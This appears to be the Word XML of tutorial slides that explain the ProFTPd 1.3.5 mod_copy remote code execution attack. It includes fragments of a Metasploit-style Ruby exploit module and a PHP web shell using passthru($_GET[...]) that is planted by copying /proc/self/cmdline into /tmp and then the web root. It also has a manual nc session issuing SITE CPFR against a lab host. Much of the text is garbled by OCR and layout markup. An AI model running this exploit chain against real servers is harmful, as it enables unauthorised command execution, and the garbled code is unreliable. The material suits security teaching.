            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">'TMPPATH' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">.&lt;?php res = sock. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D187EC6" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="439" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="795" w:right="1079"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">unless res &amp;&amp; res. include? ('350' ) fail_with(Fai1ure: : Unknown, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="099A27BE" wp14:editId="79F3637C">
                  <wp:extent cx="1485900" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202329" name="Picture 2023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29" name="Picture 202329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0"/>
              </w:rPr>
              <w:t>end</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FC42A20" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="28" w:line="217" w:lineRule="auto"/>
              <w:ind w:left="810" w:right="254"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve">sock. put("SITE CPTO </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:tab/>
              <w:t>'SITEPATH'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="093C867C" wp14:editId="71FFEF07">
                  <wp:extent cx="57150" cy="123825"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202338" name="Picture 2023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38" name="Picture 202338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8"/>
              </w:rPr>
              <w:t xml:space="preserve">res = sock. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3390F04F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="153" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="1125" w:right="104" w:hanging="330"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">unless res &amp;&amp; res. include? ('250' ) fail_with(Fai1ure: : Unknown, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0281D14A" wp14:editId="4946AD2B">
                  <wp:extent cx="1485900" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202331" name="Picture 2023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31" name="Picture 202331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5FC2A4" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="810" w:right="6764" w:hanging="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="36"/>
              </w:rPr>
              <w:t>end sock . close</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7194" w:type="dxa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26BAF368" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="4020"/>
                <w:tab w:val="center" w:pos="4185"/>
                <w:tab w:val="center" w:pos="5325"/>
              </w:tabs>
              <w:spacing w:after="386"/>
              <w:ind w:left="-180"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t xml:space="preserve">passthru($_GET[\ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="376E27AF" wp14:editId="17F545FC">
                  <wp:extent cx="828675" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202400" name="Picture 2024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00" name="Picture 202400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8"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="378A8D1E" wp14:editId="5954970E">
                  <wp:extent cx="95250" cy="133350"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202337" name="Picture 2023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37" name="Picture 202337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8"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D33E827" wp14:editId="6B5DE181">
                  <wp:extent cx="76200" cy="171450"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202336" name="Picture 2023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36" name="Picture 202336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8"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BA0FAB1" wp14:editId="39BE1046">
                  <wp:extent cx="76200" cy="152400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202335" name="Picture 2023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35" name="Picture 202335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8"/>
              </w:rPr>
              <w:t>' ] ) ;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B831B34" wp14:editId="7FB7888E">
                  <wp:extent cx="781050" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="202399" name="Picture 2023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99" name="Picture 202399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18B0D9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="100"/>
              <w:ind w:hanging="330"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="34"/>
              </w:rPr>
              <w:t>Failure copying from temporary file")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67456D64" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="796"/>
              <w:ind w:left="-1185"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EFEBAA7" wp14:editId="4D4B774D">
                  <wp:extent cx="2171700" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="340799" name="Picture 3407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799" name="Picture 340799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827935" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>
              </w:numPr>
              <w:spacing w:after="0"/>
              <w:ind w:hanging="330"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="38"/>
              </w:rPr>
              <w:t>Failure copying PHP payload to website path, directory not writable?")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A5F0C" w14:paraId="68817946" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2646"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="91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1E4101FD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C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3EF5FA9C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc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7D9C193F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A166824" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This code puts PHP code following the /tmp directory on the command-line!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="632CAE9F" wp14:editId="4433E7F2">
            <wp:extent cx="523875" cy="1504950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340791" name="Picture 340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91" name="Picture 340791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14A1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1080" w:right="18330"/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0" wp14:anchorId="1656151E" wp14:editId="7F74F071">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>781050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6076950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340801" name="Picture 340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01" name="Picture 340801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6723F60" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-1080" w:right="18330"/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0" wp14:anchorId="4439295E" wp14:editId="5FF4E0F9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>571500</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="12192000" cy="6286500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="340803" name="Picture 340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03" name="Picture 340803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7F62C61" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="445" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Finally executing commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A114B4C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="45"/>
        <w:ind w:left="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5067AAE4" wp14:editId="3413BF07">
                <wp:extent cx="10515600" cy="104775"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="340808" name="Group 3408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600" cy="104775"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="10515600" cy="104775"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="340807" name="Shape 340807"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1051560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00" h="104775">
                                <a:moveTo>
                                  <a:pt x="0" y="52388"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="10515600" y="52388"/>
                                </a:lnTo>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="10477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0808" style="width:828pt;height:8.25pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="105156,1047">
                <v:shape id="Shape 340807" style="position:absolute;width:105156;height:1047;left:0;top:0;" coordsize="10515600,104775" path="m0,52388l10515600,52388">
                  <v:stroke weight="8.25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tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="16584" w:type="dxa"/>
        <w:tblInd w:w="315" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="95" w:type="dxa"/>
          <w:left w:w="135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6584"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="7CC3686B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="4854"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16584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64827614" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="40"/>
              </w:rPr>
              <w:t>print_ status (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74942CFB" wp14:editId="738E9749">
                  <wp:extent cx="847725" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="216011" name="Picture 2160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011" name="Picture 216011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0"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Executing PHP payload #{target_uri . </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="404EC055" wp14:editId="28355D9D">
                  <wp:extent cx="2409825" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="216012" name="Picture 2160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012" name="Picture 216012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0"/>
              </w:rPr>
              <w:t>res = send_request_cgi ! (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BF8C470" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="31" w:line="296" w:lineRule="auto"/>
              <w:ind w:left="1125" w:right="5979"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">'uri' </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>normalize_uri(target_uri . path, payload_name), ' method '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>'GET',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11950177" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1928"/>
                <w:tab w:val="center" w:pos="4298"/>
                <w:tab w:val="center" w:pos="8228"/>
              </w:tabs>
              <w:spacing w:after="468"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t>'vars_get '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">{ get_arg </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">"nohup </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2255169F" wp14:editId="35518949">
                  <wp:extent cx="1057275" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="216013" name="Picture 2160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013" name="Picture 216013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2"/>
              </w:rPr>
              <w:t>encoded} &amp;"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C65E09D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="1065" w:right="1614" w:hanging="360"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="42"/>
              </w:rPr>
              <w:t xml:space="preserve">unless res &amp;&amp; res . code 2ee fail_with (Failure: : Unknown, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="140C7FDA" wp14:editId="3E9188DD">
                  <wp:extent cx="2314575" cy="180975"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="216014" name="Picture 2160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014" name="Picture 216014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2"/>
              </w:rPr>
              <w:t xml:space="preserve"> - Failure executing payload")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B66AB39" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:right="15099" w:firstLine="705"/>
            </w:pP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0" wp14:anchorId="703C68BD" wp14:editId="588B0E6C">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>9677400</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>228600</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="1219200" cy="628650"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="216091" name="Picture 2160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091" name="Picture 216091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36"/>
              </w:rPr>
              <w:t>end end end</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F89D258" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr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0" wp14:anchorId="69B5377F" wp14:editId="681F0369">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>9867900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>285750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="561975" cy="828675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="216092" name="Picture 2160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92" name="Picture 216092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The command is included as an HT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">TP GET variable &amp; executed with PHP! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08D2D227" wp14:editId="1AD4D113">
            <wp:extent cx="495300" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340805" name="Picture 340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05" name="Picture 340805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7561" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="430" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>The difference between the Ruby script and the Python 2 script for exploiting ProFTPd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573EC402" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>Copies from / proc/ self/cmdline...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF25C4B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="360"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="58"/>
        </w:rPr>
        <w:t>This includes the filenames used in the mod_copy operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CB5B5F" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="415" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71659480" wp14:editId="60FEE118">
            <wp:extent cx="594360" cy="152400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340810" name="Picture 340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10" name="Picture 340810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4"/>
        </w:rPr>
        <w:t xml:space="preserve">Toa fake file, /tmp/&lt;?php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D0E3375" wp14:editId="14D8CBE6">
            <wp:extent cx="3665220" cy="289560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="216848" name="Picture 2168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48" name="Picture 216848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4"/>
        </w:rPr>
        <w:t xml:space="preserve"> ? &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157D3936" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>Notice this is in /tmp, a world-writable directory!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00087D1A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="290"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="62"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>No more Permission Denied error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3EF90" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="190" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>The PHP code present in the filename is now in the file!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FA4C17" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="555"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now copy that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>file to the folder accessible to the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A460199" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15612" w:right="-510"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C12F977" wp14:editId="5EF92BEF">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="216849" name="Picture 216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49" name="Picture 21684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0C25" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="46"/>
        <w:ind w:left="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="78"/>
        </w:rPr>
        <w:t>Let's see that manually as well:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:vertAnchor="text" w:tblpX="323" w:tblpY="804"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="16568" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="27" w:type="dxa"/>
          <w:left w:w="128" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="1245" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="16568"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A5F0C" w14:paraId="428DF5DA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="3073"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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61B6BECE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="4613"/>
              </w:tabs>
              <w:spacing w:after="15"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>root@kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="44"/>
              </w:rPr>
              <w:tab/>
              <w:t>nc 192.168. 229.105 21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AC2DD19" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
            <w:pPr>
              <w:spacing w:before="2" w:after="0" w:line="216" w:lineRule="auto"/>
              <w:ind w:left="15" w:right="4665" w:hanging="15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06368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="18176AA2" wp14:editId="55629786">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>566738</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-29961</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="914400" cy="28575"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="226979" name="Picture 2269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979" name="Picture 226979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0" wp14:anchorId="425BE53E" wp14:editId="5A765523">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="column">
                    <wp:posOffset>3224213</wp:posOffset>
                  </wp:positionH>
                  <wp:positionV relativeFrom="paragraph">
                    <wp:posOffset>-20436</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="723900" cy="19050"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:wrapSquare wrapText="bothSides"/>
                  <wp:docPr id="226911" name="Picture 2269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911" name="Picture 226911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1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48"/>
              </w:rPr>
              <w:t xml:space="preserve">220 ProFTPD 1.3.5 server (Great job! ) [172.17.e.2] site cpfr /proc/self/cmdline </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08AD02D9" wp14:editId="7052FE38">
                  <wp:extent cx="1181100" cy="257175"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="227043" name="Picture 2270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043" name="Picture 227043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AEF9DCF" wp14:editId="1585E498">
                  <wp:extent cx="1181100" cy="9525"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
